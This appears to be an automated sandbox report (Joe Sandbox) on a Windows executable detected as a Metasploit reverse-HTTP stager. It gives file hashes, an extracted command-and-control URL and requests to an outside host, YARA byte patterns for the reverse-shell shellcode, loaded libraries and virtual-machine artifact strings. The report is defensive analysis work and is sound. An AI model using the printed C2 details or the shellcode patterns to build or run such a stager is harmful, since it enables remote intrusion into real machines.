Edit tour

Windows Analysis Report
443_2003_https-df.exe

Overview

General Information

Sample name:443_2003_https-df.exe
Analysis ID:1636969
MD5:8d9c0f42baf129d1b430a01463dd7870
SHA1:4054be8879b458c034340b19311baa42218c216d
SHA256:b3ffbb213580aac6f9dc8d7ea321bd61be3e5cd41647e29aabeaedee2bfc4b83
Tags:exemalwareRozenauser-Joker
Infos:

Detection

Metasploit
Score:96
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
C2 URLs / IPs found in malware configuration
Joe Sandbox ML detected suspicious sample
AV process strings found (often used to terminate AV products)
Entry point lies outside standard sections
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • 443_2003_https-df.exe (PID: 2820 cmdline: "C:\Users\user\Desktop\443_2003_https-df.exe" MD5: 8D9C0F42BAF129D1B430A01463DD7870)
    • WerFault.exe (PID: 1412 cmdline: C:\Windows\system32\WerFault.exe -u -p 2820 -s 1812 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
{
  "Type": "Metasploit Connect",
  "URL": "http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S"
}
SourceRuleDescriptionAuthorStrings
443_2003_https-df.exeJoeSecurity_MetasploitPayload_2Yara detected Metasploit PayloadJoe Security
    443_2003_https-df.exeJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
      443_2003_https-df.exeWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
      • 0x18db:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
      443_2003_https-df.exeWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
      • 0x1881:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
        00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmpWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
        • 0xdb:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
        00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
        • 0x81:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
        00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
          00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmpWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
          • 0xdb:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          0.0.443_2003_https-df.exe.140000000.0.unpackJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
            0.0.443_2003_https-df.exe.140000000.0.unpackWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
            • 0x1723:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
            0.0.443_2003_https-df.exe.140000000.0.unpackWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
            • 0x16c9:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
            0.2.443_2003_https-df.exe.140000000.0.unpackJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
              0.2.443_2003_https-df.exe.140000000.0.unpackWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
              • 0x1723:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
              Click to see the 1 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 443_2003_https-df.exeAvira: detected
              Source: 443_2003_https-df.exeMalware Configuration Extractor: Metasploit {"Type": "Metasploit Connect", "URL": "http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S"}
              Source: 443_2003_https-df.exeVirustotal: Detection: 78%Perma Link
              Source: 443_2003_https-df.exeReversingLabs: Detection: 84%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: unknownHTTPS traffic detected: 74.82.86.0:443 -> 192.168.2.9:49683 version: TLS 1.2

              Networking

              barindex
              Source: Malware configuration extractorURLs: http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S HTTP/1.1Host: cdn123.offseccdn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Cache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\443_2003_https-df.exeCode function: 0_2_00000001400042B6 VirtualAlloc,InternetReadFile,0_2_00000001400042B6
              Source: global trafficHTTP traffic detected: GET /8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S HTTP/1.1Host: cdn123.offseccdn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Cache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: good.com
              Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
              Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://good.com/
              Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://good.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7
              Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000000.00000002.1160429536.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000000.00000002.1160712596.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000000.00000003.1076984923.00000000005DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.blackberry.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
              Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
              Source: unknownHTTPS traffic detected: 74.82.86.0:443 -> 192.168.2.9:49683 version: TLS 1.2

              System Summary

              barindex
              Source: 443_2003_https-df.exe, type: SAMPLEMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
              Source: 443_2003_https-df.exe, type: SAMPLEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 0.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
              Source: 0.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 0.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
              Source: 0.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
              Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
              Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: C:\Users\user\Desktop\443_2003_https-df.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2820 -s 1812
              Source: 443_2003_https-df.exe, type: SAMPLEMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
              Source: 443_2003_https-df.exe, type: SAMPLEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 0.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
              Source: 0.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 0.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
              Source: 0.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
              Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
              Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: classification engineClassification label: mal96.troj.winEXE@2/6@1/1
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2820
              Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\2c0a8481-0add-47fa-a8eb-a8d5161218d0Jump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 443_2003_https-df.exeVirustotal: Detection: 78%
              Source: 443_2003_https-df.exeReversingLabs: Detection: 84%
              Source: unknownProcess created: C:\Users\user\Desktop\443_2003_https-df.exe "C:\Users\user\Desktop\443_2003_https-df.exe"
              Source: C:\Users\user\Desktop\443_2003_https-df.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2820 -s 1812
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: 443_2003_https-df.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: initial sampleStatic PE information: section where entry point is pointing to: .jcho
              Source: 443_2003_https-df.exeStatic PE information: real checksum: 0xfa97 should be: 0xfc4f
              Source: 443_2003_https-df.exeStatic PE information: section name: .jcho
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: Amcache.hve.3.drBinary or memory string: VMware
              Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
              Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.000000000055A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@(Z%SystemRoot%\system32\mswsock.dllkk
              Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.3.drBinary or memory string: vmci.sys
              Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.3.drBinary or memory string: VMware20,1
              Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.3.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
              Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
